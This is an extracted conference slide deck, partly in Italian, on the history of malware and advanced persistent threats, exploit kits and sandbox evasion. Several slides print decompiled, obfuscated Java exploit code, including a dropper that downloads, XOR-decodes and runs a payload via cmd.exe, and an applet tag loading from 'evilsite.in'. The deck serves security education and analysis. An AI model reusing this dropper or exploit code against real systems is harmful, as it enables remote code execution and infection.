1. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
THE MAGIC WORLD OF
ADVANCED PERSISTENT THREATS
Andrea Pompili
There are only 10 types
of people in the world:
Those who understand binary,
and those who don't
apompili@hotmail.com
2. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Attacker Zovi)
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
3. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Come si sviluppa un attacco?
<#1>
<#2>
<#3>
4. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html
5. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
<2000>
8,7 miliardi di dollari
6. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<2001> The Nimda Style
Microsoft IIS e PWS Extended Unicode Directory transversalVulnerability
Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Microsoft IE MIME Header Attachment
Execution VulnerabilityTFTP Server
UDP:69
RICHED20.DLL
Microsoft Office 2000 DLL Execution Vulnerability
Microsoft IE MIME Header Attachment Execution Vulnerability
635 milioni di dollari
7. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
SQL Server 2000 Desktop Engine
75.000 computer infettati in soli 10 minuti
payload di soli 376 byte (residente esclusivamente in memoria)
1,2 miliardi di dollari
8. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
22,6 miliardi di dollari
DDOS contro www.sco.com
Upload&Execute0x85 0x13 0x3c 0x9e 0xa2
Backdoor TCP 3127-3198
http://echohacker.altervista.org/articoli/mydoom.html
9. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-
for-zero-days-an-price-list-for-hackers-secret-software-exploits/
ShoppingFor Zero-Days
10. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Il Malware piĂč complesso della storia
> 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati)
> 80 domini utilizzati come sistemi di Comando e Controllo
> Diffusione via USB Stick (Infectmedia)
> Enumerazione dei dispositivi
Bluetooth (Beetlejuice)
> Registrazione audio (Microbe)
> Windows Update MITM
(Munch & Gadget)
MD5 Collision Attack
11. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html
12. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
« »
13. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Advanced Persistent Threats 101
> Trust Exploitation
Social Engineering
Spear Phishing
Botnet
Drive-to-Click Strategy
14. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
> Trust Exploitation
> Client Exploitation
Exploit Pack (e.g.Neutrino)
0-Day
Advanced Persistent Threats 101
15. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
> Trust Exploitation
> Client Exploitation
> Multi-Stage Shellcoding
Dropper/Downloader
Modules(e.g.RAT, Infostealer,etc.)
Good Covert Channel
Advanced Persistent Threats 101
16. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
> Trust Exploitation
> Client Exploitation
> Multi-Stage
> Multi-Vector
Email
WebSites
Botnet
Physical (USB)
Advanced Persistent Threats 101
17. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
> Trust Exploitation
> Client Exploitation
> Multi-Stage
> Multi-Vector
> Resiliency
Camouflaging
Command &Control
Good Covert Channel
Advanced Persistent Threats 101
18. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Make or Buy?
19. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The Botnet Choice
20. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Drive-to-Click <#1>
21. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Drive-to-Click <#2>
22. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Drive-to-Click <#3>
23. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Drive-to-Click <#4>
24. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Drive-to-Click <#5>
25. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Trick#1> Giochiamo con le estensioni
RLO Unicode control character
26. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
Download Server Response Headers
RFC 2616
27. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<applet codebase=âhttp://blahblah.evilsite.in/hiddenpath/"
archive=âhttp://blahblah.othersite.in/hiddenpath/
c8c34734f41cca863a972129369060d9â code=ârgmivâ>
Trick#3> Client Exploiting
28. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
public class xp extends JApplet {
public void init() {
try {
Object aobj[] = new Object[0];
Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
String s = "hpjwbludyi";
s = "wgpxrwyvzolbb";
s = "zdfmvftloqmakqysyu";
s = "nrrkqnjfylgtljyyferr";
cr.hzumfnc(obj);
Object aobj1[] = new Object[0];
String s1 = "ofvszonrzgelnko";
s1 = "fefhtspcqhj";
s1 = "evztavmzjarjgwu";
Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
Integer.TYPE
}).newInstance(new Object[] {
Integer.valueOf(tcbteokd.mdrikbua(9))
});
int ai[] = new int[8];
Object aobj2[] = new Object[7];
aobj2[2] = cr.hzumfnc(obj);
...
29. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7");
...
public static String n(String s) {
String s1 = "";
for (int i = 0; i < s.length(); i++)
s1 += idzfihff(s.charAt(i));
return s1;
}
...
public static char idzfihff(char c) {
return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/
BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
30. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<02> Java Reflection
public static Class fuss(String s) throws Exception {
return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) {
return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) {
return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/
BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
31. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<03> ClassLoader Override
class t extends ClassLoader {
public static void ujrzjw(t t1, String s) {
try {
Class class1 = t1.defineClass("qbw",
tcbteokd.xcpoalaefqfvuacylvakyi, 0,
tcbteokd.xcpoalaefqfvuacylvakyi.length);
ygigtele.bjixqh(class1, new Class[] {
tcbteokd.fuss("java.lang.String")
}).newInstance(new Object[] { s });
} catch (Exception ex) {
System.exit(0);
}
}
}
Malware
32. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
...
private static void lcsqyrgtbct (String s, int i) {
String s1 = s + Integer.valueOf(i);
...
rchannel= Channels.newChannel((new URL(s1)).openStream());
...
File file = File.createTempFile("~tmf", null);
FileOutputStream fos= new FileOutputStream(file);
for (int j = 0; j < abyte0.length; j++)
abyte0[j] = (byte)(abyte0[j] ^ 0x29);
fos.write(abyte0);
if (abyte0.length > 1024)
try {
Runtime.getRuntime().exec(new String[] {
"cmd.exe", "/C", file.getAbsolutePath()
});
} catch (IOException ioe) {
(new ProcessBuilder(new String[] {
file.getAbsolutePath()
})).start();
}
The Dropper Class
33. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
MultiPixelPackedSampleModel obj8 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1,
0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte obj10 = new byte[] {0, -1}
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);
The Malware Core
http://valhalla.allalla.com/2013/08/
java-netbeans-applet-integer-overflow-win32-target-added/
34. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The Cheaper Path to Exploiting
Blackole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-
exploit-kit.html
RedKit
http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
35. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The InfoStealer Choice
36. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The RAT Choice
37. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Bitcoin + APT = Ransomware
38. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The Command&Control Choice <#1>
39. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The Command&Control Choice <#2>
40. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The Command&Control Choice <#3>
41. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The Command&Control Choice <#4>
42. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
âThe truth is, consumer-grade antivirus products canât
protect against targeted malware created by well-
resourced nation-states with bulging budgets.
They can protect you against run-of-the-mill malware:
banking trojans, keystroke loggers and e-mail worms.
But targeted attacks like these go to great lengths to
avoid antivirus products on purposeâ
MikkoHypponen(F-Secure)
<2012> The Antivirus Maker Confession
43. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
The Way to Sandboxing
44. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
<01> USER-MODE AGENT
Softwarecomponent inaguest operating system (keylogger)
<02> KERNEL-MODE PATCHING
Guestoperating system Kernelmodified fortracing (rootkit)
<03> VIRTUAL MACHINE MONITORING
Customized Hypervisor to monitor the guest operatingsystem
<04> SYSTEM EMULATION
Hardwareemulator to hookappropriate memory, IO functions,peripherals, etc.
<05> KERNEL EMULATION
Kernelemulator tohookappropriate system calls, etc.
The Way to Sandboxing
45. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Una lista (molto) parziale dei Player
> Norman Sandbox (Norway2001)
> FireEye (US2004)
> Damballa (US2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)
46. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
47. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Una lista (completamente) parziale degli Evader
48. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Evading Sandbox 4 Dummies
> Human Interaction (UpClicker, December 2012)
> MessageBox (Something thatneed to be clicked)
> Sleep Calls (Trojan Nap, uncoveredin February2013)
> Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and Size
> Check self Executable name
> Execution after reboot
> Check System services, files and communication ports
49. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Il limite delle Sandbox
Minuti
def: il Paziente Zero Ăš il primo paziente individuato nel
campione della popolazione di un'indagine
epidemiologicaâŠ
50. Page ï§ âčNâș
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com â Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
Sicuramente meglio che confidare negli utenti